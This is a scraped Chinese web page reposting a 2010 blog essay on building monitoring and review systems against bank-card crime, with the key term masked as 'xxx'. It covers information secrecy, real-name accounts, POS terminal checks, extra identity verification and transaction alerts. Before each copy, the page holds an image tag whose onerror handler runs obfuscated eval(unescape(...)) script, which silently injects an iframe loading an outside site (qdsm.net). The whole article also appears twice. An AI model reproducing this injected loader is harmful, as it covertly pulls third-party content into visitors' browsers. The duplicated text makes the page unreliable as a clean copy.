监控审核体系 防范xxx犯罪
[转贴 2010-05-03 04:26:24]
监控审核体系 防范xxx犯罪
![]()
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zf_250_250.html%20width%3D250%20height%3D250%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml1%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">
虽然我国xxx业务飞速发展,但其应用水平还处于不断完善的初级形态。日益增加的xxx犯罪行为,更暴露出xxx业务管理上存在的漏洞。有效建立xxx交易防控审核体系,则可有效遏制犯罪,解决好用卡安全问题,有助于社会和谐环境的建设。
不法分子要想获得他人xxx上的信息,必须依靠一些特殊手段,针对xxx的作案手段也因此日趋多样化,且多为分工明确的团伙作案。要想做好风险防范,首先就要知道犯罪分子到底用什么样的信息来实施犯罪,以及不法分子取得xxx信息的来源有哪些。
目前,我国的xxx大多数为磁条卡,磁条卡信息通过一般设备即可读写,并且相对来讲,磁条卡所包含信息比较简单。对此,除了持卡人要加强个人防范意识外,xx机构从管理、操作和技术三个方面入手,建立一整套成熟而又完备的监控和审核体系也非常有必要。
加强xxx行业的xxx及账户信息安全管理水平。从整个行业来看,我国xxx产业尚处于快速发展的时期,产业链已经初步形成,一旦发生卡账户信息安全事件,将对产业发展带来不利影响。同时,中国银联正处于业务迅速发展期,xxx及账户信息安全管理经验也有待积累,完整全面的信息安全管理规章制度、危机处理机制均有待建立并逐步完善。
xxx犯罪必须取得的正是相应的关联信息,因此,加强xxx及账户信息安全管理工作显得非常必要和迫切。一是信息不能泄密。xx机构的渠道及牵涉人员较多,必须从制度上加以控制和从道德上加以教育;二是保证信息不能被破坏,信息备份隔离保管;三是制卡要按照严格的流程管理,并签订安全保密合约;四是空白xxx要严格按照重要空白凭证管理,搞清楚每一张卡的来龙去脉;五是在xx时有义务告之持卡人xxx的所有关联信息及提醒注意对xxx及账户信息的保密管理,并经常查询账户和保留适度余额。以上五个方面是管理xxx信息最基础和直接的工作,事实上xx机构也都建立了相关制度和管理程序。现在最关键的问题是要落实,按制度和程序去做。
xx机构在xx和用卡的操作层面应采取安全措施。
1、加强宣传力度,突出安全提示。作为xx机构,银行和银联应承担向持卡人以及整个社会做好宣传的义务。一是建议xx机构广泛告知持卡人统一的客服电话,提醒持卡人不要轻易上当;二是建议适当借助媒体力量,通过电视、报纸或其他媒体进行风险提示,进行预防性安全用卡教育。
2、充分落实实名制。建议严格审查开户申请及身份证件,尽量杜绝使用虚假身份证件和冒用他人身份开立xxx账户的行为。
3、针对短信欺诈事件,银行和银联等各方要及时总结整理虚假短信范例及防范措施,并向社会公布,帮助持卡人及早预防。
4、加强交易机具管理。一是机具放在醒目位置;二是废弃的机具要及时回收;三是对机具的操作权限要严格控制;四是要核实确认机具维护人员的身份;五是要落实商户回访制度,实地检查POS机具是否被改装、非法拆卸。
建立我国xxx业务的监控和审核体系最关键是技术实现手段的问题。xxx犯罪主要体现为技术犯罪,如何堵塞漏洞是考虑问题的直接出发点。按照国外的经验是推广使用芯片卡,但目前国内大多是使用磁条卡,替代还有一个漫长过程,如何从技术上加强管理和提升交易安全级别设计是现阶段解决防控问题的核心。首先还是一个意识问题,现在无论是管理者还是一般业务人员在充分享受计算机应用带来便捷的同时对安全意识还是不够重视。目前科技队伍的数量和质量以及相对稳定性都不够,导致信息系统应用质量下降。一是要加强相关信息系统的管理,从系统建设开始就要控制可能的风险。由于目前银行业信息系统建设一般采取外包形式,其中牵涉到源代码及账户信息的泄露,因此,必须与外包服务商签订安全保证协议。二是防止信息系统设计上的漏洞。后台监控信息必须合理控制,交易日志查询及管理必须严格限制范围,对持卡人敏感信息的访问进行物理隔离和限制。三是硬件设备要合理配置,保证信息不被破坏。四是交易过程中要实现多重身份验证和多级审核。目前的xxx交易仅需要一级密码确认,突破这一层防线就无法再防范了。在交易过程中,我们建议再增加一级特色身份确认,提示持卡人在交易时输入自己的身份证号码或其他特色号码。五是与持卡人签订协议,让交易系统自动实现正常交易提醒和异常交易警示。在持卡人发生一笔交易后就及时告之,并对大额交易和在限额内的频繁交易跟踪警示。
![]()
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zf_336_280.html%20width%3D336%20height%3D280%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml2%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">
虽然我国xxx业务飞速发展,但其应用水平还处于不断完善的初级形态。日益增加的xxx犯罪行为,更暴露出xxx业务管理上存在的漏洞。有效建立xxx交易防控审核体系,则可有效遏制犯罪,解决好用卡安全问题,有助于社会和谐环境的建设。
不法分子要想获得他人xxx上的信息,必须依靠一些特殊手段,针对xxx的作案手段也因此日趋多样化,且多为分工明确的团伙作案。要想做好风险防范,首先就要知道犯罪分子到底用什么样的信息来实施犯罪,以及不法分子取得xxx信息的来源有哪些。
目前,我国的xxx大多数为磁条卡,磁条卡信息通过一般设备即可读写,并且相对来讲,磁条卡所包含信息比较简单。对此,除了持卡人要加强个人防范意识外,xx机构从管理、操作和技术三个方面入手,建立一整套成熟而又完备的监控和审核体系也非常有必要。
加强xxx行业的xxx及账户信息安全管理水平。从整个行业来看,我国xxx产业尚处于快速发展的时期,产业链已经初步形成,一旦发生卡账户信息安全事件,将对产业发展带来不利影响。同时,中国银联正处于业务迅速发展期,xxx及账户信息安全管理经验也有待积累,完整全面的信息安全管理规章制度、危机处理机制均有待建立并逐步完善。
xxx犯罪必须取得的正是相应的关联信息,因此,加强xxx及账户信息安全管理工作显得非常必要和迫切。一是信息不能泄密。xx机构的渠道及牵涉人员较多,必须从制度上加以控制和从道德上加以教育;二是保证信息不能被破坏,信息备份隔离保管;三是制卡要按照严格的流程管理,并签订安全保密合约;四是空白xxx要严格按照重要空白凭证管理,搞清楚每一张卡的来龙去脉;五是在xx时有义务告之持卡人xxx的所有关联信息及提醒注意对xxx及账户信息的保密管理,并经常查询账户和保留适度余额。以上五个方面是管理xxx信息最基础和直接的工作,事实上xx机构也都建立了相关制度和管理程序。现在最关键的问题是要落实,按制度和程序去做。
xx机构在xx和用卡的操作层面应采取安全措施。
1、加强宣传力度,突出安全提示。作为xx机构,银行和银联应承担向持卡人以及整个社会做好宣传的义务。一是建议xx机构广泛告知持卡人统一的客服电话,提醒持卡人不要轻易上当;二是建议适当借助媒体力量,通过电视、报纸或其他媒体进行风险提示,进行预防性安全用卡教育。
2、充分落实实名制。建议严格审查开户申请及身份证件,尽量杜绝使用虚假身份证件和冒用他人身份开立xxx账户的行为。
3、针对短信欺诈事件,银行和银联等各方要及时总结整理虚假短信范例及防范措施,并向社会公布,帮助持卡人及早预防。
4、加强交易机具管理。一是机具放在醒目位置;二是废弃的机具要及时回收;三是对机具的操作权限要严格控制;四是要核实确认机具维护人员的身份;五是要落实商户回访制度,实地检查POS机具是否被改装、非法拆卸。
建立我国xxx业务的监控和审核体系最关键是技术实现手段的问题。xxx犯罪主要体现为技术犯罪,如何堵塞漏洞是考虑问题的直接出发点。按照国外的经验是推广使用芯片卡,但目前国内大多是使用磁条卡,替代还有一个漫长过程,如何从技术上加强管理和提升交易安全级别设计是现阶段解决防控问题的核心。首先还是一个意识问题,现在无论是管理者还是一般业务人员在充分享受计算机应用带来便捷的同时对安全意识还是不够重视。目前科技队伍的数量和质量以及相对稳定性都不够,导致信息系统应用质量下降。一是要加强相关信息系统的管理,从系统建设开始就要控制可能的风险。由于目前银行业信息系统建设一般采取外包形式,其中牵涉到源代码及账户信息的泄露,因此,必须与外包服务商签订安全保证协议。二是防止信息系统设计上的漏洞。后台监控信息必须合理控制,交易日志查询及管理必须严格限制范围,对持卡人敏感信息的访问进行物理隔离和限制。三是硬件设备要合理配置,保证信息不被破坏。四是交易过程中要实现多重身份验证和多级审核。目前的xxx交易仅需要一级密码确认,突破这一层防线就无法再防范了。在交易过程中,我们建议再增加一级特色身份确认,提示持卡人在交易时输入自己的身份证号码或其他特色号码。五是与持卡人签订协议,让交易系统自动实现正常交易提醒和异常交易警示。在持卡人发生一笔交易后就及时告之,并对大额交易和在限额内的频繁交易跟踪警示。
郑重声明:资讯 【监控审核体系防范xxx犯罪- 零售银行转型- blanknote - 和讯博客】由 发布,版权归原作者及其所在单位,其原创性以及文中陈述文字和内容未经(企业库qiyeku.com)证实,请读者仅作参考,并请自行核实相关内容。若本文有侵犯到您的版权, 请你提供相关证明及申请并与我们联系(qiyeku # qq.com)或【在线投诉】,我们审核后将会尽快处理。
—— 相关资讯 ——
